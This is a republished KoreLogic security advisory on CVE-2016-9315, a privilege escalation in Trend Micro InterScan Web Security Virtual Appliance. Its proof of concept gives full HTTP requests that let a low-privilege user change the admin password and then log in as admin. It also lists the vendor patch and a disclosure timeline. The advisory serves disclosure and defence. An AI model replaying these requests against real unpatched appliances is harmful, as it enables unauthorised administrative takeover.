Trendmicro InterScan 6.5-SP2_Build_Linux_1548 Privilege Escalation

Published
Credit
Risk
2017.02.18
Matt Bergin
Medium
CWE
CVE
Local
Remote
CWE-269
CWE-264
CVE-2016-9315
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4/10
2.9/10
8/10
Exploit range
Attack complexity
Authentication
Remote
Low
Single time
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

KL-001-2017-002 : Trendmicro InterScan Privilege Escalation Vulnerability

Title: Trendmicro InterScan Privilege Escalation Vulnerability
Advisory ID: KL-001-2017-002
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-002.txt


1. Vulnerability Details

Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application
Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-269: Improper Privilege Management
Impact: Privilege Escalation
Attack vector: HTTP
CVE-ID: CVE-2016-9315

2. Vulnerability Description

Any authenticated user can execute administrative functionality

3. Technical Description

1. Login as least privileged user role.

POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/logon.jsp
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

wherefrom=&wronglogon=no&uid=reports&passwd=reports&pwd=Log+On

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location:
https://1.3.3.8:8443/index.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:02:24 GMT
Connection: close

2. Use session identifier to run administrator functionality to change
admin password.

POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://1.3.3.8:8443/login_account_add_modify.jsp?CSRFGuardToken=9RN5D8EPS3MS4R5BCQMR3KE4SHPVCMZV&op=review&uid=admin
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 280


CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&accountop=review&allaccount=admin&allaccount=auditor&allaccount=reports&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=korelogic2&PASS2=korelogic2&description=Master+Administrator&role_select=0&roleid=0

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location:
https://1.3.3.8:8443/login_accounts.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:37 GMT
Connection: close

3. Login as admin

POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://1.3.3.8:8443/logout.jsp?CSRFGuardToken=VS0DHVK4Q9T7GJF0N08812Y5FNTNT67M
Cookie: JSESSIONID=6903A112B76F642A05573990BB3057DB
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

uid=admin&passwd=korelogic2

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location:
https://1.3.3.8:8443/index.jsp?CSRFGuardToken=IDVSTBAEVTSQOP6GJWZI3BDZZVBKAYW4&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:54 GMT
Connection: close

4. Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability in Version
6.5 CP 1737. Security advisory and link to the patched version
available at:

https://success.trendmicro.com/solution/1116672

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2016.12.12 - KoreLogic sends vulnerability report and PoC to
Trendmicro.
2016.12.12 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to
this and other KoreLogic reported issues will
likely be available after the 45 business day
deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched
version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

References:

https://www.korelogic.com/Resources/Advisories/KL-001-2017-002.txt


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com